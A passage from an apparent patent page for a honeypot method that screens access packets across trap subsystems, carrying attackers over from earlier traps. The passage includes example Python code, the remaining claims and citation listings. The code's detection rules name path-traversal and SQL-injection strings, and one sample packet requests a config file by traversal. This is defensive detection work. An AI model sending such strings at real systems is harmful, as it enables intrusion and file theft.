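    results: Dict[str, List[AccessPacket]] = {}
    for position, sub in enumerate(screening_order(subsystems)):
        received = [p for p in packets if p.subsystem == sub.name]
        if position == 0:
            # Front of the order: only this subsystem's own rule is available.
            attack = [p for p in received if sub.rule(p)]
        else:
            # Packets from senders already identified by an earlier subsystem
            # are attack packets without re-screening ...
            carried = [p for p in received if p.sender in attackers]
            # ... and the rule is applied only to the still-unscreened remainder.
            unscreened = [p for p in received if p.sender not in attackers]
            attack = carried + [p for p in unscreened if sub.rule(p)]
        attackers.update(p.sender for p in attack)
        results[sub.name] = attack
    return results, attackers


def attack_risk(results: Dict[str, List[AccessPacket]]) -> Dict[str, int]:
    """Constructed risk measure: number of subsystems in which a sender produced attack packets."""
    risk: Dict[str, int] = {}
    for attack_packets in results.values():
        for sender in {p.sender for p in attack_packets}:
            risk[sender] = risk.get(sender, 0) + 1
    return risk


def process(results: Dict[str, List[AccessPacket]], block_threshold: int = 2) -> Dict[str, str]:
    """Processing step: block senders whose risk reaches the threshold, monitor the rest."""
    return {sender: ("block" if r >= block_threshold else "monitor")
            for sender, r in attack_risk(results).items()}


# Constructed subsystems; the rules are deliberately simple string checks.
SUBSYSTEMS = [
    Subsystem("smb_trap", 1, lambda p: p.payload == "probe"),
    Subsystem("web_trap", 3, lambda p: "../" in p.payload or "union select" in p.payload.lower()),
    Subsystem("ssh_trap", 2, lambda p: p.payload.count("login-fail") >= 3),
]

# Constructed access packets as received by each induction server.
PACKETS = [
    AccessPacket("10.0.0.5", "web_trap", "GET /index.html"),
    AccessPacket("10.0.0.9", "web_trap", "GET /static/../../config"),
    AccessPacket("10.0.0.9", "ssh_trap", "login-ok"),    # carried over from web_trap, no rule needed
    AccessPacket("10.0.0.7", "ssh_trap", "login-fail login-fail login-fail"),
    AccessPacket("10.0.0.5", "ssh_trap", "login-ok"),
    AccessPacket("10.0.0.7", "smb_trap", "list shares"),  # carried over from ssh_trap
    AccessPacket("10.0.0.11", "smb_trap", "probe"),
    AccessPacket("10.0.0.5", "smb_trap", "list shares"),
]


def run_demo():
    results, attackers = screen(SUBSYSTEMS, PACKETS)
    return results, attackers, process(results)


if __name__ == "__main__":
    res, who, actions = run_demo()
    for name, pk in res.items():
        print(name, [(p.sender, p.payload) for p in pk])
    print("attackers:", sorted(who))
    print("actions:", actions)
```

The point the example makes explicit is the carry-over in the second screening unit: a weak trap (smb_trap here) cannot detect the "list shares" packet by its own rule, yet still classifies it as an attack packet because the same sender was already caught by a stronger trap earlier in the order.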
13. A computer device, characterized in that the computer device comprises: a memory, a processor and a computer program stored on the memory and executable on the processor, wherein the processor implements the method according to any one of claims 1-11 when executing the computer program.
14. A storage medium having stored thereon a computer program for causing a computer to perform the steps of the method according to any of claims 1-11 when the computer program runs on the computer.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202110032177.XA CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202110032177.XA CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Publications (2)

Publication Number Publication Date
CN114765553A true CN114765553A (en) 2022-07-19
CN114765553B CN114765553B (en) 2024-04-30

Family

ID=82363017

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202110032177.XA Active CN114765553B (en) 2021-01-11 2021-01-11 Security management method, device, computer equipment and storage medium for access data

Country Status (1)

Country Link
CN (1) CN114765553B (en)

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN106603541A (en) * 2016-12-21 2017-04-26 哈尔滨安天科技股份有限公司 Honeynet system based on differentiated flow processing mechanism
CN106656922A (en) * 2015-10-30 2017-05-10 阿里巴巴集团控股有限公司 Flow analysis based protective method and device against network attack
CN109347830A (en) * 2018-10-23 2019-02-15 中国人民解放军战略支援部队信息工程大学 Network dynamic defense system and method
CN110011982A (en) * 2019-03-19 2019-07-12 西安交通大学 Virtualization-based intelligent attack deception system and method

Also Published As

Publication number Publication date
CN114765553B (en) 2024-04-30

Similar Documents

Publication Publication Date Title
Nawrocki et al. A survey on honeypot software and data analysis
Baykara et al. A novel honeypot based security approach for real-time intrusion detection and prevention systems
Tsikerdekis et al. Approaches for preventing honeypot detection and compromise
Fan et al. Honeydoc: an efficient honeypot architecture enabling all-round design
US20170180421A1 (en) Deception using Distributed Threat Detection
CN112995151B (en) Access behavior processing method and device, storage medium and electronic equipment
Nicomette et al. Set-up and deployment of a high-interaction honeypot: experiment and lessons learned
EP3414663A1 (en) Automated honeypot provisioning system
CN112383546A (en) Method for processing network attack behavior, related device and storage medium
KR101534194B1 (en) cybersecurity practical training system and method that reflects the intruder behavior patterns
Tambe et al. Detection of threats to IoT devices using scalable VPN-forwarded honeypots
CN110381041B (en) Distributed denial of service attack situation detection method and device
US10243983B2 (en) System and method for using simulators in network security and useful in IoT security
Rebecchi et al. DDoS protection with stateful software‐defined networking
Osanaiye et al. TCP/IP header classification for detecting spoofed DDoS attack in Cloud environment
CN113691504B (en) Network trapping method and system based on software defined network
CN113179280B (en) Deception defense method and device based on malicious code external connection behaviors and electronic equipment
Srinivasa et al. Interaction matters: a comprehensive analysis and a dataset of hybrid IoT/OT honeypots
Zuzčák et al. Expert system assessing threat level of attacks on a hybrid SSH honeynet
US20240114052A1 (en) Network security system for preventing spoofed ip attacks
CN114765553B (en) Security management method, device, computer equipment and storage medium for access data
Memari et al. Container based virtual honeynet for increased network security
Nogues et al. Labelled network capture generation for anomaly detection
Khirwadkar Defense against network attacks using game theory
Sedlar et al. An iteratively-improving internet-of-things honeypot experiment

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant